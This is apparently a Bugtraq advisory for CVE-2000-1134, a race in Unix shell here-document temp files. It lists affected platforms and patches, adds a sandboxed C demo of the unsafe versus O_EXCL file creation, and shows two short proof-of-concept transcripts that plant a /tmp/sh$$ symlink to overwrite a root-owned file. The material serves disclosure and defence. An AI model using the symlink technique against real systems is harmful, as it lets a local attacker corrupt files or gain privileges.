Unix Shell Redirection Race Condition Vulnerability

BID:2006

Info

Bugtraq ID: 2006
Class: Race Condition Error
CVE: CVE-2000-1134
Remote: No
Local: Yes
Published: Jan 02 2000 12:00AM
Updated: Jul 11 2009 03:56AM
Credit: This issue for bash and ksh was discovered and posted to BugTraq by Paul Szabo <[email protected]>. The tcsh variation was posted to BugTraq by proton <[email protected]>. This vulnerability was originally discovered by Gordon Irlam.
Vulnerable: Wirex Immunix OS 6.2
tcsh tcsh 6.9 .00
tcsh tcsh 6.8 .00
tcsh tcsh 6.7.2
SuSE Linux 7.0
Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5
Sun Cobalt RaQ4 RAID 3100R
Sun Cobalt RaQ4 Japanese RAID 3100R-ja
Sun Cobalt RaQ4 3001R
Sun Cobalt RaQ XTR Japanese 3500R-ja
Sun Cobalt RaQ XTR 3500R
Sun Cobalt RaQ XTR
Sun Cobalt RaQ 4
Sun Cobalt Qube3 w/Caching 4010WG
Sun Cobalt Qube3 w/ Caching and RAID 4100WG
Sun Cobalt Qube3 Japanese w/Caching 4010WGJ
Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ
Sun Cobalt Qube3 Japanese 4000WGJ
Sun Cobalt Qube3 4000WG
Sun Cobalt Qube 3
SGI IRIX 6.5.13 m
SGI IRIX 6.5.13 f
SGI IRIX 6.5.13
SGI IRIX 6.5.12 m
SGI IRIX 6.5.12 f
SGI IRIX 6.5.12
SGI IRIX 6.5.11 m
SGI IRIX 6.5.11 f
SGI IRIX 6.5.11
SGI IRIX 6.5.10 m
SGI IRIX 6.5.10 f
SGI IRIX 6.5.10
SGI IRIX 6.5.9
SGI IRIX 6.5.8
SGI IRIX 6.5.7
SGI IRIX 6.5.6
SGI IRIX 6.5.5
SGI IRIX 6.5.4
SGI IRIX 6.5.3
SGI IRIX 6.5.2
SGI IRIX 6.5.1
SGI IRIX 6.5
SCO Open Server 5.0.6 a
SCO Open Server 5.0.6
SCO Open Server 5.0.5
SCO Open Server 5.0.4
SCO Open Server 5.0.3
SCO Open Server 5.0.2
SCO Open Server 5.0.1
SCO Open Server 5.0
SCO eServer 2.3
SCO eDesktop 2.4
Redhat Linux 6.2 E sparc
Redhat Linux 6.2 E i386
Redhat Linux 6.2 E alpha
Redhat Linux 6.2 sparc
Redhat Linux 6.2 i386
Redhat Linux 6.2 alpha
Redhat Linux 6.1 sparc
Redhat Linux 6.1 i386
Redhat Linux 6.1 alpha
Redhat Linux 6.0 sparc
Redhat Linux 6.0 alpha
Redhat Linux 6.0
Redhat Linux 5.2 sparc
Redhat Linux 5.2 i386
Redhat Linux 5.2 alpha
Redhat bash-1.14.7-22.i386.rpm
+ Redhat Linux 6.2
Redhat bash-1.14.7-16.i386.rpm
+ Redhat Linux 6.0
Redhat bash-1.14.7-13.i386.rpm
+ Redhat Linux 5.2
Netscape Communicator 6.01a
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Mandriva Linux Mandrake 7.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0
HP HP-UX 11.11
HP HP-UX 11.0 4
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 9.0
FreeBSD FreeBSD 5.0
FreeBSD FreeBSD 4.2
FreeBSD FreeBSD 3.5.1
Digital (Compaq) TRU64/DIGITAL UNIX 5.0
Compaq Tru64 5.1 a
Compaq Tru64 5.1
Compaq Tru64 5.0 a
Compaq Tru64 5.0
Compaq Tru64 4.0 g
Compaq Tru64 4.0 f
Compaq Tru64 4.0 d
Caldera OpenLinux Desktop 2.3
Apple Mac OS X 10.0.4
Apple Mac OS X 10.0.3
Apple Mac OS X 10.0.2
Apple Mac OS X 10.0.1
Apple Mac OS X 10.0
Not Vulnerable: Sun Solaris 8_sparc
SGI IRIX 6.5.14 m
SGI IRIX 6.5.14 f
SGI IRIX 6.5.14
IBM AIX 4.3.3
HP HP-UX 11.0
Apple Mac OS X 10.1

Discussion

bash, tcsh, cash, ksh and sh are all variations of the Unix shell distributed with many Unix and Unix clone operating systems. A vulnerability exists in these shells that could allow an attacker to arbitrarily write to files.

A vulnerability has been discovered in a number of Unix shells which may allow a local attacker to corrupt files or potentially elevate privileges.

Scripts and command-line operations that use << as a redirection operator (a here-document) cause the shell to create files in the /tmp directory with a predictable naming convention. Additionally, these files are created in /tmp without first checking whether the file already exists.

This could result in a symbolic link attack that could be used to corrupt any file that the owner of the redirecting shell has access to write to. This issue affects those systems running vulnerable versions of bash, tcsh, cash, ksh and sh.

ksh is reportedly not vulnerable for IBM AIX systems.
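
The file-creation flaw described above, shown beside the atomic-creation fix, as an added example that is not part of the original advisory or of any shell's source. The sandbox directory, the victim file and the sh<pid>.1 name inside it are constructed for the demonstration, and the open() flags are an assumption about the vulnerable pattern rather than code taken from a shell.

```c
/* Added example: all paths live in a private mkdtemp() sandbox (constructed). */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ORIG "hello world\n"   /* constructed victim contents */

/* Pattern the advisory describes: predictable name, no existence check.
   open() follows a pre-planted symlink and writes into its target. */
static int open_unsafe(const char *p) { return open(p, O_WRONLY | O_CREAT, 0600); }

/* Hardened: O_CREAT|O_EXCL is atomic and fails with EEXIST when the name
   is already taken, even by a symlink, which is never followed. */
static int open_excl(const char *p) { return open(p, O_WRONLY | O_CREAT | O_EXCL, 0600); }

/* One here-document style write where the predictable name is already a
   symlink to "victim". Returns 1 if the victim is unchanged afterwards,
   0 if it was overwritten, -1 on setup failure. */
int victim_intact(int hardened) {
    char dir[] = "/tmp/heredoc-demo-XXXXXX";
    char victim[64], tmp[64], buf[sizeof ORIG] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/sh%ld.1", dir, (long)getpid());

    int fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || write(fd, ORIG, strlen(ORIG)) < 0) return -1;
    close(fd);
    if (symlink(victim, tmp) != 0) return -1;

    fd = hardened ? open_excl(tmp) : open_unsafe(tmp);
    if (fd >= 0) {                      /* the shell spools the here-document */
        if (write(fd, "FOO\n", 4) < 0) return -1;
        close(fd);
    }
    fd = open(victim, O_RDONLY);
    ssize_t n = fd < 0 ? -1 : read(fd, buf, sizeof buf - 1);
    if (fd >= 0) close(fd);
    unlink(tmp); unlink(victim); rmdir(dir);
    return n < 0 ? -1 : strcmp(buf, ORIG) == 0;
}

int main(void) {
    printf("no existence check: victim intact = %d\n", victim_intact(0));
    printf("O_CREAT|O_EXCL:     victim intact = %d\n", victim_intact(1));
    return 0;
}
```

mkstemp(3) performs the same O_CREAT|O_EXCL creation with an unpredictable name, which removes the guessable-name half of the problem as well.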

Exploit / POC

This example was contributed by Paul Szabo <[email protected]>:

#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*

This example was submitted by proton <[email protected]> in an October 29th, 2001 BugTraq posting:

/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#

Zenith Parsec <[email protected]> submitted an exploit for bash on Linux systems.

Solution / Fix

Solution:
HP have released a security bulletin to address this issue in HP-UX. Customers who are affected by this issue are advised to apply appropriate patches as soon as possible. See referenced advisory for further detail regarding applying fixes. This bulletin has been revised to include fixes for HP-UX 11.04.

Sun has released an alert containing fixes to address this issue.

Sun has also released fixes for RaQ4, Qube3 and RaQXTR.

Various upgrades and patches have been made available:


Sun Cobalt RaQ4 Japanese RAID 3100R-ja

Sun Cobalt RaQ 4

Redhat bash-1.14.7-16.i386.rpm

Redhat bash-1.14.7-22.i386.rpm

Sun Solaris 8_sparc

Sun Solaris 2.5

Sun Cobalt Qube3 4000WG

Sun Cobalt Qube3 w/ Caching and RAID 4100WG

Sun Cobalt RaQ4 3001R

Sun Solaris 2.6

Sun Cobalt RaQ XTR 3500R

Sun Cobalt Qube3 Japanese w/ Caching and RAID 4100WGJ

Redhat bash-1.14.7-13.i386.rpm

Sun Cobalt RaQ XTR Japanese 3500R-ja

Sun Solaris 2.5_x86

Sun Cobalt Qube3 w/Caching 4010WG

Sun Solaris 2.6_x86

Sun Cobalt RaQ XTR

Sun Cobalt Qube3 Japanese 4000WGJ

Sun Cobalt Qube3 Japanese w/Caching 4010WGJ

Sun Solaris 7.0

Sun Cobalt Qube 3

Sun Solaris 7.0_x86

Sun Solaris 8_x86

HP HP-UX 10.20

HP HP-UX 11.0 4

HP HP-UX 11.0

HP HP-UX 11.11

Caldera OpenLinux Desktop 2.3

SCO eServer 2.3

SCO eDesktop 2.4

Sun Solaris 2.5.1 _x86

Sun Solaris 2.5.1

FreeBSD FreeBSD 3.5.1

Compaq Tru64 4.0 f

Compaq Tru64 4.0 g

Compaq Tru64 4.0 d

FreeBSD FreeBSD 4.2

FreeBSD FreeBSD 5.0

Compaq Tru64 5.0

Compaq Tru64 5.0 a

SCO Open Server 5.0

SCO Open Server 5.0.1

SCO Open Server 5.0.3

SCO Open Server 5.0.4

SCO Open Server 5.0.5

SCO Open Server 5.0.6 a

SCO Open Server 5.0.6

Compaq Tru64 5.1 a

Compaq Tru64 5.1

Redhat Linux 5.2 alpha

Redhat Linux 5.2 i386

Redhat Linux 5.2 sparc

Redhat Linux 6.0 alpha

Redhat Linux 6.0

Mandriva Linux Mandrake 6.0

Redhat Linux 6.0 sparc

Redhat Linux 6.1 sparc

Redhat Linux 6.1 alpha

Redhat Linux 6.1 i386

Mandriva Linux Mandrake 6.1

Redhat Linux 6.2 alpha

Redhat Linux 6.2 E alpha

Redhat Linux 6.2 i386

Redhat Linux 6.2 E i386

Redhat Linux 6.2 E sparc

Wirex Immunix OS 6.2

Redhat Linux 6.2 sparc

SGI IRIX 6.5

SGI IRIX 6.5.1

SGI IRIX 6.5.10

SGI IRIX 6.5.10 m

SGI IRIX 6.5.10 f

SGI IRIX 6.5.11

SGI IRIX 6.5.11 m

SGI IRIX 6.5.11 f

SGI IRIX 6.5.12 f

SGI IRIX 6.5.12 m

SGI IRIX 6.5.12

SGI IRIX 6.5.13 f

SGI IRIX 6.5.13 m

SGI IRIX 6.5.2

SGI IRIX 6.5.3

SGI IRIX 6.5.4

SGI IRIX 6.5.5

SGI IRIX 6.5.6

SGI IRIX 6.5.7

SGI IRIX 6.5.8

tcsh tcsh 6.7.2

tcsh tcsh 6.8 .00

tcsh tcsh 6.9 .00

Mandriva Linux Mandrake 7.1

Mandriva Linux Mandrake 7.2
